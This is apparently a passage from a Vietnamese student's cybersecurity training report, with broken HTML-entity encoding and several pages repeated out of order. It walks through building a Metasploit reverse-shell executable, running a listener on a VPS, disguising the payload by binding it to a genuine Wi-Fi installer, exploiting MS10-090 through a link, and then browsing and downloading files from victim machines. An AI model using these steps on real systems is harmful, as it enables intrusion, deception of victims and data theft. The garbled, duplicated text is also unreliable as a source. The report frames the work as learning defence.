File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
